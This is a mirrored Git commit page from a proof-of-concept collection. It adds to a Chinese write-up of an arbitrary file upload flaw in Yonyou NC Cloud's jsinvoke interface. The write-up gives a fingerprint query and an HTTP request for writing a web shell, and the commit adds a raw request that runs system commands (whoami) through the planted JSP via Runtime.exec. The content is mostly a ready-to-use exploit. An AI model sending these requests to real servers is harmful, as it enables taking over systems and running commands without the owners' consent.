crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 23:54:51 +08:00
Code Issues Packages Projects Releases Wiki Activity

Update 用友 NC Cloud jsinvoke 任意文件上传漏洞.md

Browse Source
This commit is contained in:
wy876 2023-11-13 19:19:39 +08:00 committed by GitHub
parent 2b66a29dff
commit 401716eba0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
用友 NC Cloud jsinvoke 任意文件上传漏洞.md
View File

@ -3,6 +3,7 @@
用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限 用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限
app="用友-NC-Cloud" app="用友-NC-Cloud"
## 写入webshell
``` ```
POST /uapjs/jsinvoke/?action=invoke POST /uapjs/jsinvoke/?action=invoke
Content-Type: application/json Content-Type: application/json
@ -40,3 +41,23 @@ Content-Type: application/x-www-form-urlencoded
} }
``` ```
## 执行命令
```
POST /407.jsp?error=bsh.Interpreter HTTP/1.1
Host: *
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=80DA93FB2FFF0204E78FA82643D5BC6E
If-Modified-Since: Fri, 09 Dec 2022 16:12:59 GMT
If-None-Match: W/"370397-1670602379000"
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
```